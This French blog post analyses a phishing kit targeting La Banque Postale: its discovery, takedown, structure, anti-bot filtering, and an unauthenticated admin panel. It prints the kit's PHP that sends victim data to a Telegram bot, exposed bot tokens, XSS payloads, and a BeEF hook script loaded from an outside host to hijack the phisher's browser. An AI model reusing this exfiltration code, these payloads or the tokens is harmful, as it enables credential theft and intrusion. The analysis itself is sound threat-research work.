Hameçonnage La Banque Postale
Écrit par l’équipe HackGyver – 21 décembre 2025
Table des matières
Introduction
Sur une période d'un mois, une boite mail dédiée au phishing a reçu 4 mails du même expéditeur «mail.jardinjapones.org.ar» les 4 mails sont identiques et visent la banque postale.
Thunderbird détecte qu'il y a une tentative de tromperie, quand on clique sur l'URL cela nous envoie sur le domaine xuexiaohu.cc
La fausse page ressemble à ça:
HTTPS est activé sur ce site, on a donc le petit cadenas à côté de l'URL.
Grâce au bourrage de crâne sur les plateaux de télé depuis des années sur le conseil du "vérifier la présence du petit cadenas quand vous êtes sur votre banque" beaucoup de personnes en font l'amalgame en pensant que ce cadenas indique que le site web est sûr et légitime.
Il n'en est rien, et on trouvera sur ce site un total de 7 kits d'hameçonnages en opération pour la banque postale.
hxxps://www[.]xuexiaohu[.]cc/wp-includes/images/smilies/postale/labanquepostale/fr/login[.]php
hxxps://www[.]xuexiaohu[.]cc/wp-includes/images/crystal/Values/labanquepostale/fr/login[.]php
hxxps://www[.]xuexiaohu[.]cc/wp-content/themes/twentytwentyone/labanquepostale/fr/login[.]php
hxxps://www[.]xuexiaohu[.]cc/wp-content/themes/twentytwentytwo/labanquepostale/fr/login[.]php
hxxps://www[.]xuexiaohu[.]cc/wp-admin/css/colors/blue/TROPICALES/labanquepostale/fr/login[.]php
hxxps://www[.]xuexiaohu[.]cc/wp-admin/css/colors/light/colors/labanquepostale/fr/login[.]php
hxxps://www[.]xuexiaohu[.]cc/wp-admin/css/colors/coffee/postale/labanquepostale/fr/login[.]php
En cherchant un peu plus, on tombe sur une interface d'administration
Obtenir une copie du kit
Comme dans la plupart des cas, plusieurs éléments du kit les rendent uniques, cela peut être un fichier .css, une image... L'astuce consiste à sauvegarder les éléments et à vérifier si une correspondance des hashs ont déjà été identifiés par une plateforme.
Dans notre cas nous prendrons le fichier «LOGO-LBP-digital-fd-clair-RVB.svg» On le retrouve dans pas mal de kits, mais par élimination on trouve un fichier .zip correspondant à celui hébergé sur notre page...
ee2ab90dbe6d774de605c978291becf7188df75c1650b92452210ea0d0ebabd3
La structure du kit correspond à ce qui est hébergé, on retrouve bien tous les éléments ainsi que le panel, la date d'upload montre également que ce kit est récent.
Nous nous intéresserons au kit un peu plus tard.
Signalement et retrait
Le domaine semble assez résistant, cela fait quasiment un mois que les liens sont envoyés en spam et tous les kits sont encore debout. Le domaine n'est pas très détecté non plus du côté des Antivirus cela est peut-être dû à Cloudflare qu'il y a derrière, la plupart des outils d'analyse automatique de type lookyloo.circl.lu, urlscan.io, phishtank.com, etc... ne passent pas la condition de challenges.cloudflare.com
On va donc contacter un peu tout le monde pour accélérer le processus.
safebrowsing.google.com, cloudflare, phishing-initiative.eu, microsoft, et faire quelques mails...
Google et Cloudflare ont été les premiers à réagir rapidement.
Deux jours plus tard, le site a été entièrement nettoyé des kits.
Maintenant que l'on a participé à l'effort pour rendre internet plus sûr, intéressons-nous au kit en lui-même.
Analyse du kit de phishing
Voici la structure du kit dans le fichier «postale.zip» récupéré
postale/
├── index.php
├── php.ini
├── antibot1.php
├── antibot2.php
├── antibot3.php
├── country.php
├── crawlerdetect.php
│
├── Antibot/
│ ├── Antibotcountry.php
│ ├── Antibotcrawlerdetect.php
│ ├── AntibotHostname.php
│ ├── AntibotInternetserviceprovider.php
│ ├── AntibotIPRangeClass.php
│ ├── AntibotProxyserver.php
│ ├── AntibotUseragent.php
│ └── AntibotVirtualprivatenetwork.php
│
├── CrawlerDetect/
│ ├── .DS_Store
│ ├── CrawlerDetect.php
│ ├── ReferralSpamDetect.php
│ └── Fixtures/
│ ├── AbstractProvider.php
│ ├── AbstractReff.php
│ ├── Crawlers.php
│ ├── Exclusions.php
│ ├── Headers.php
│ ├── Headerspam.php
│ └── SpamReferrers.php
│
├── labanquepostale/
│ ├── index.php
│ ├── config.php
│ ├── main.php
│ ├── md.php
│ ├── log.txt
│ ├── bots_log.txt
│ │
│ ├── botMother/
│ │ ├── botMother.php
│ │ ├── index.php
│ │ └── data/
│ │ ├── .htaccess
│ │ ├── AGENTS.jhn
│ │ ├── IPS.jhn
│ │ └── IPS_RANGE.jhn
│ │
│ ├── fr/
│ │ ├── index.php
│ │ ├── login.php
│ │ ├── cc.php
│ │ ├── details.php
│ │ ├── phone.php
│ │ ├── sms.php
│ │ ├── inst.php
│ │ ├── post.php
│ │ ├── wait.php
│ │ └── res/
│ │ ├── app.css
│ │ ├── main.css
│ │ ├── style.css
│ │ ├── error.png
│ │ ├── logo.png
│ │ ├── search.png
│ │ ├── loading.gif
│ │ ├── ill_citoyenne.svg
│ │ ├── LOGO-LBP-digital-fd-clair-RVB.svg
│ │ ├── LOGO-LBP-digital-fd-glass-RVB.svg
│ │ └── svg-icons.svg
│ │
│ ├── lib/
│ │ └── frm.php
│ │
│ └── panel/
│ ├── index.php
│ ├── ctr.php
│ ├── fetch.php
│ ├── get_statu.php
│ ├── update_statu.php
│ ├── panel.class.php
│ ├── res/
│ │ └── style.css
│ └── graveyard/
│ ├── f528764d624db12.txt
│ ├── data/
│ │ └── f528764d624db12.txt
│ ├── device/
│ │ └── f528764d624db12.txt
│ ├── inst/
│ │ ├── d41d8cd98f00b20.txt
│ │ └── f528764d624db12.txt
│ ├── qr/
│ │ ├── f528764d624db12.txt.png
│ │ └── f528764d624db12.txt2.png
│ └── status/
│ └── f528764d624db12.txt
│
├── result/
│ ├── index.php
│ └── total_bot.txt
│
└── security/
├── index.php
├── blacklist.dat
├── dispose.dat
├── hostname.dat
├── ip.dat
├── isp.dat
├── onetime.dat
├── ua-full.dat
├── user.dat
├── useragent.dat
└── whitelist.dat
Commençons par les fichiers à la racine. Le fichier «php.ini» contient des données qui n’ont rien à voir avec la configuration de PHP:
setting_host='on'
setting_isp='on'
setting_ua='on'
setting_iprange='on'
setting_proxy='on'
setting_vpn='on'
Token='1912518434:AAG3EgARV8Fmw1i72FCwbiY2CRiM_PqN66Q'
ChatID='505206024'
Le fichier «index.php» charge des fichiers «antibot» et lit par la suite le contenu de «php.ini»
<?php
require_once 'antibot1.php';
require_once 'antibot2.php';
$tanitatikaram = parse_ini_file("php.ini", true);
$setting_vpn = $tanitatikaram['setting_vpn'];
if ($setting_vpn == 'on')
{
require_once 'antibot3.php';
}
header('Location: ./labanquepostale/');«antibot1.php»: Ce fichier comme son nom l'indique est un fichier anti-bot, il récupère l'adresse IP, l'user-agent, détermine l'ISP puis effectue des vérifications si l'user-agent, le hostname, l'ISP, l'OS, sont suspects Pour cela il utilise des listes noires contenues dans des fichiers «.dat» dans le dossier «security». L'adresse IP est aussi passée contre une liste noire contenue dans le code et non pas via un fichier «.dat», si une des conditions est remplie alors une fausse page d'erreur 404 s'affiche, sinon on passe à la page suivante «antibot2.php»
«antibot2.php»: Cette page est censée détecter les proxy, mais... la page utilise une API d'un site «api.iptrooper.net» qui est hors service, le résultat est donc que tout le monde réussit cette vérification !
«antibot3.php»: Nous allons sur cette page si «setting_vpn» définie dans «php.ini» est activée, c'est le cas par défaut dans notre kit. Ce fichier effectue de la vérification d'adresse IP via une liste blanche et une liste noire contenue dans le dossier «security». La liste noire contient des ranges d'IP utilisés par des antivirus (McAfee, Kaspersky, Avira, Bitdefender..) On a aussi des IP appartenant à Amazon, Yahoo, des noeuds Tor...) Le fichier de whitelist contient juste «127.0.0.1»
Fichiers inutilisés
Le dossier «security» possède aussi un fichier «dispose.dat» contenant une liste noire d'email temporaire, mais aussi un fichier «onetime.dat», «user.dat» qui sont vides. Ces trois fichiers ne sont pas utilisés dans le kit.
Nous avons à la racine aussi «crawlerdetect.php» qui appelle pas mal d'autres fichiers contenus dans le dossier «CrawlerDetect» l'intégralité du dossier n'est pas utilisé, car «crawlerdetect.php» n'est jamais appelé. Nous avons aussi quelques fichiers dans le dossier «Antibot» qui ne sont pas utilisés.
À la racine on a aussi «country.php» qui appelle des fichiers dans le dossier «Antibot» pour bloquer par géolocalisation d'adresse IP. Ce fichier n'est jamais utilisé, et pour la géolocalisation il utilise une API via «geoplugin.net» qui ne propose plus d'utilisation gratuite.
{
"geoplugin_status":403,
"geoplugin_message": "geoPlugin API is no longer available for free use. To continue access, please upgrade to a paid plan",
"geoplugin_url": "https://www.geoplugin.com/subscription"
}On a aussi un fichier «result/total_bot.txt» ce fichier vide est lui aussi jamais appelé dans le kit.
Vraiment du grand n'importe quoi au niveau de la configuration et des fichiers fantômes... On notera qu'à la racine tous les fichiers ont un timestamp de dernière modification datant d’aout 2021. le seul fichier ayant un timestamp récent est «index.php» Il est très probable que l'auteur du kit a simplement essayé de faire un "assemblage" ou un "recyclage" d'un vieux code d'antibot provenant d'un autre kit, sans trop comprendre ce qu'il faisait...
Maintenant passons au dossier «labanquepostale» on commence par index.php:
<?php
require 'main.php';
@$m->saveHit();
header("location: fr/login.php");
?>Bon et bien allons voir «main.php»...
<?php
require (__DIR__).'/config.php';
require (__DIR__).'/panel/panel.class.php';
require (__DIR__).'/lib/frm.php';
require (__DIR__).'/md.php';
$pnl = new Panel();
$current_data = $pnl->getData();
require (__DIR__).'/botMother/botMother.php';
$bm = new botMother();
$m = new botMother();
$bm->setExitLink("https://www.labanquepostale.fr/");
$bm->setGeoFilter("");
$bm->setLicenseKey("");
$bm->setTestMode(false);
if(strtolower($antibot)=="yes"){
$bm->run();
}
function setError($msg){
if(isset($_GET['e'])){
echo '<div class="error">'.$msg.'</div>';
}
}
?>Dans un premier temps on appelle «config.php» Ce fichier contient quelques variables, comme par exemple la configuration d'un token de bot Telegram et l'ID du canal pour l'exfiltration des données. On retrouve aussi quelques fonctions, notamment une pour communiquer avec l'API de Telegram.
$token = "8148219988:AAHiNPfOI1nwy-jzwALjDASw8yei0TuTiLg";
$id = "7355056232";
// use antibot? yes|no
$antibot = "yes";
[...]
function call($msg){
global $token;
global $id;
global $panel_link;
$info = "
/- MORE INFO -/
PANEL: $panel_link
IP: ".$_SERVER['REMOTE_ADDR']."
TIME: ".date("m/d/Y h:i:sa");
$c = curl_init('https://api.telegram.org/bot'.$token.'/sendMessage?chat_id='.$id.'&text='.urlencode($msg.$info));
curl_setopt($c, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($c, CURLOPT_RETURNTRANSFER, true);
$res = curl_exec($c);
curl_close($c);
return $res;
}
function save($txt){
$fp = fopen((__DIR__)."/rez.txt", "a");
fwrite($fp, $txt);
fclose($fp);
}Spoiler: la fonction save() de config.php n'est jamais utilisée dans le kit. Le fichier «/panel/panel.class.php» est utilisé pour gérer les données des victimes, nous traiterons la partie "administration du kit" à la fin.
«/lib/frm.php» Ce fichier contient une fonction pour créer des pages de phishing unique avec un nom du genre md5(time().rand(0,999999)) il ajoute aussi un bout de code d'autodestruction après visite.. La fonction n'est jamais utilisée.
«md.php» Ce fichier contient des fonctions pour détecter si la page de phishing est visionnée depuis un smartphone, et adapter l'affichage en fonction. Là encore Mobile_Detect n'est jamais utilisé.
«botMother/botMother.php» Ce fichier est un deuxième système anti-bot, cette fois-ci le fichier est utilisé, il comporte plusieurs fonctions de détection d'user-agent, de blocage par IP, et géographique. Ce fichier enregistre aussi un fichier «bots_log.txt» pour les bots bloqués, et «log.txt» pour les visites. Il y a une fonction d'obfuscation pour empêcher les bots de faire du scrapping de texte. Le fichier main a une fonction setLicenseKey(""); liée à botMother, mais celle-ci n'est jamais utilisée.
Voilà pour les grandes lignes du kit. Le dossier «labanquepostale\fr» contient les fausses pages de la banque postale, je ne pense pas que ça soit très intéressant de détailler ce que fait chaque page.
On notera quand même la présence à la fin de chaque page de phishing d'un bout de code en JavaScript:
setInterval(() => {
$.post("../panel/update_statu.php",{update:1, ip:'<?php echo $pnl->IP; ?>'});
}, 1000);
var page ="<?php echo @$_GET['p']; ?>";
var cd = "<?php echo $current_data; ?>";
setInterval(() => {
$.post("../panel/fetch.php", {update:1}, function(d){
if(cd!=d && d!=0){
window.location=d;
}
})
}, 2000);Ce code sert de battement de coeur quand l'utilisateur navigue sur les pages de phishing, toute les une seconde, l'activité est reportée au panel d'administration pour suivre en temps réel ou en est la personne sur la navigation des pages. Cela permet un suivit et aussi de pouvoir rediriger/contrôlé au besoin la navigation de l'utilisateur pour s'adapter selon les réponses (demander un code SMS si CB validée)
On releve aussi une XSS temporaire dans la variable «p» qui du coup est présente dans toutes les pages de phishing.
Exemple de payload: labanquepostale/fr/login.php?p=";alert('XSS');//
Le panel d'administration
Le panel d'administration est ouvert à tous ceux qui connaissent son chemin il n'y a pas de protection dessus.
Il permet de contrôler le flux de navigation de l'utilisateur.
Il s'appelle sous la forme /panel/ctr.php?ip=127.0.0.1 où 127.0.0.1 est l'adresse IP de la personne à administrer.
Les boutons du haut «LOGIN ERROR», «PHONE», «CARD», etc... permettent de rediriger la personne sur la page voulue.
Le bouton «INSTRUCTION» permet de rediriger sur une page de phishing personnalisé depuis le panel admin.
Les instructions pour chaque IP sont stockées dans des fichiers texte. C'est le fichier «/panel/panel.class.php» qui gère ça. Il prend l'adresse IP, le hash en MD5, puis prend les 15 premiers caractères du hash pour créer le fichier texte de suivi de l'utilisateur.
function makeVicFile(){
if(!file_exists($this->DATA_PATH. $this->getHashName($this->IP))){
$fp = fopen($this->DATA_PATH. $this->getHashName($this->IP), "w+");
fwrite($fp, 0);
fclose($fp);
}
if(!file_exists($this->DATA_STATU_PATH. $this->getHashName($this->IP))){
$fp = fopen($this->DATA_STATU_PATH. $this->getHashName($this->IP), "w+");
fwrite($fp, time());
fclose($fp);
}
}
function editVicFile($data, $vip){
$fp = fopen($this->DATA_PATH. $this->getHashName($vip), "w+");
fwrite($fp, $data);
fclose($fp);
}
function getHashName($vip){
$this->HASH = substr(md5($vip), 0 , 15).".txt";
return $this->HASH;
}Si on ouvre le panel admin sans argument d'adresse IP alors on se retrouve avec une chaine vide, et le panel suit le fichier d41d8cd98f00b20.txt
Vulnérabilités dans le panel d'administration
En plus d'être ouvert, il y a quelques failles XSS.
Une XSS temporaire avec le paramètre «ip» de ctr.php: labanquepostale/panel/ctr.php?ip=<script>alert(1337);</script>
«ip» est affiché directement, sans sanitisation de ce que contient la variable:
<form>
<span>[<?php echo @$_GET['ip'];?>] </span>
<span>[<span id="statu">loading...</span>]</span>
</form>En un peu plus critique on a aussi une XSS en insertion via d41d8cd98f00b20.txt là aussi le code avec «ip» n'est pas sanitisé.
<textarea style="width:100%; height:200px;" placeholder="Write some instructions here..." name="inst"><?php echo @$pnl->getInst(@$_GET['ip']); ?></textarea>Nous pouvons imaginer une attaque via le framework BeEF intégré avec kali Linux, vérifions tout ça, on lance beef-xss:
┌──(kali㉿kali)-[~]
└─$ sudo beef-xss
[-] You are using the Default credentials
[-] (Password must be different from "beef")
[-] Please type a new password for the beef user:
[i] GeoIP database is missing
[i] Run geoipupdate to download / update Maxmind GeoIP database
[*] Please wait for the BeEF service to start.
[*]
[*] You might need to refresh your browser once it opens.
[*]
[*] Web UI: http://127.0.0.1:3000/ui/panel
[*] Hook: <script src="http://<IP>:3000/hook.js"></script>
[*] Example: <script src="http://127.0.0.1:3000/hook.js"></script>
● beef-xss.service - beef-xss
Loaded: loaded (/usr/lib/systemd/system/beef-xss.service; disabled; preset: disabled)
Active: active (running) since Sat 2025-12-20 12:22:37 EST; 5s ago
Invocation: 841385897b5e47c383aab06371928004
Main PID: 2272 (ruby)
Tasks: 4 (limit: 2073)
Memory: 157.4M (peak: 246.8M)
CPU: 2.963s
CGroup: /system.slice/beef-xss.service
└─2272 ruby ./beef
Dec 20 12:24:21 kali systemd[1]: Started beef-xss.service - beef-xss.
Dec 20 12:24:23 kali beef-include-vendor[3576]: [12:24:22][*] Browser Exploitation Framework (BeEF) 0.5.4.0
Dec 20 12:24:23 kali beef-include-vendor[3576]: [12:24:22] | Twit: @beefproject
Dec 20 12:24:23 kali beef-include-vendor[3576]: [12:24:22] | Site: https://beefproject.com
Dec 20 12:24:23 kali beef-include-vendor[3576]: [12:24:22] |_ Wiki: https://github.com/beefproject/beef/wiki
Dec 20 12:24:23 kali beef-include-vendor[3576]: [12:24:22][*] Project Creator: Wade Alcorn (@WadeAlcorn)
Dec 20 12:24:23 kali beef-include-vendor[3576]: [12:24:22][*] BeEF is loading. Wait a few seconds...
[*] Opening Web UI (http://127.0.0.1:3000/ui/panel) in: 5... 4... 3... 2... 1...
┌──(kali㉿kali)-[~]
└─$ hostname -I
192.168.1.58 2001:861:5bc0:6fb0:9e6d:dfe0:b24d:a928 BeEF nous donne directement notre payload pour le hook, ce fichier JavaScript à inclure va être notre agent entre nous et le client.
On peut imaginer un payload dans le champ instruction du genre: test</textarea><script src='http://192.168.1.58:3000/hook.js'></script>
Il suffira alors pour l'administrateur de visiter simplement ctr.php pour que le script s'exécute en arrière-plan.
Tout comme le pirate avec son kit de phishing, nous voici ici entre lui et son navigateur:
La liste de module sur BeEF nous permet par exemple de visualiser le code source de la page dans le navigateur exploité
Ou encore de récupérer ce qu'il tape au clavier
BeEF nous permet aussi d'exécuter du code dans le client, ou même de faire du phishing via le module Google Phishing !
Voilà, la boucle est bouclée.
OSINT
Par rapport au token Telegram récupéré depuis le fichier config.php, il est possible de récolter ces informations via des API de Telegram:
{
"ok": true,
"result": {
"id": 8148219988,
"is_bot": true,
"first_name": "CvCNBYDBTResultats",
"username": "suzannejeany_bot",
"can_join_groups": true,
"can_read_all_group_messages": false,
"supports_inline_queries": false,
"can_connect_to_business": false,
"has_main_web_app": false
}
}Les API utiles:
https://api.telegram.org/bot8148219988:AAHiNPfOI1nwy-jzwALjDASw8yei0TuTiLg/getMe
https://api.telegram.org/bot8148219988:AAHiNPfOI1nwy-jzwALjDASw8yei0TuTiLg/getMyCommands
https://api.telegram.org/bot8148219988:AAHiNPfOI1nwy-jzwALjDASw8yei0TuTiLg/getBotName
https://api.telegram.org/bot8148219988:AAHiNPfOI1nwy-jzwALjDASw8yei0TuTiLg/getWebhookInfo
https://api.telegram.org/bot8148219988:AAHiNPfOI1nwy-jzwALjDASw8yei0TuTiLg/getMyShortDescription
https://api.telegram.org/bot8148219988:AAHiNPfOI1nwy-jzwALjDASw8yei0TuTiLg/getMyDescription
https://api.telegram.org/bot8148219988:AAHiNPfOI1nwy-jzwALjDASw8yei0TuTiLg/getMyDefaultAdministratorRights
https://api.telegram.org/bot8148219988:AAHiNPfOI1nwy-jzwALjDASw8yei0TuTiLg/getChatAdministrators
https://api.telegram.org/bot8148219988:AAHiNPfOI1nwy-jzwALjDASw8yei0TuTiLg/getChatMember
https://api.telegram.org/bot8148219988:AAHiNPfOI1nwy-jzwALjDASw8yei0TuTiLg/getChatMembersCount?chat_id=-7355056232
https://api.telegram.org/bot8148219988:AAHiNPfOI1nwy-jzwALjDASw8yei0TuTiLg/getChat?chat_id=-7355056232
https://api.telegram.org/bot8148219988:AAHiNPfOI1nwy-jzwALjDASw8yei0TuTiLg/getChatMenuButton
https://api.telegram.org/bot8148219988:AAHiNPfOI1nwy-jzwALjDASw8yei0TuTiLg/setChatMenuButton
Je ne me suis pas trop attardé à essayer d'aller plus loin dans la reconnaissance de ce token.
Conclusion
Bon et bien voilà, on a fait le tour de ce kit de phishing visant La Banque Postale. Côté takedown, mission accomplie. Google et Cloudflare ont réagi rapidement, et deux jours plus tard le site était nettoyé. Comme quoi, signaler ça sert à quelque chose, même si le domaine a tenu presque un mois avant qu'on s'en occupe...
Côté analyse du kit, c'est du bricolage de l'amateurisme. On a des fichiers qui ne servent à rien, des APIs qui ne marchent plus depuis des années (RIP geoplugin et iptrooper), du code mort partout, et des timestamps qui montrent clairement que c'est du recyclage de vieux code de 2021. L'auteur a visiblement fait du copier-coller sans trop comprendre ce qu'il faisait. Et le meilleur pour la fin: le panel d'administration est ouvert à tout le monde, sans aucune authentification, avec des XSS en bonus. Du coup on a pu retourner la situation avec BeEF et transformer le phisher en victime. On peut lui voler ses frappes clavier, exécuter du code dans son navigateur, et même lui afficher une fausse page Google pour récupérer ses identifiants. L'arroseur arrosé, comme on dit.
Au final ce kit nous rappelle que derrière beaucoup de campagnes de phishing y'a pas des génies du mal, juste des gens qui recyclent du code qu'ils ne comprennent pas vraiment.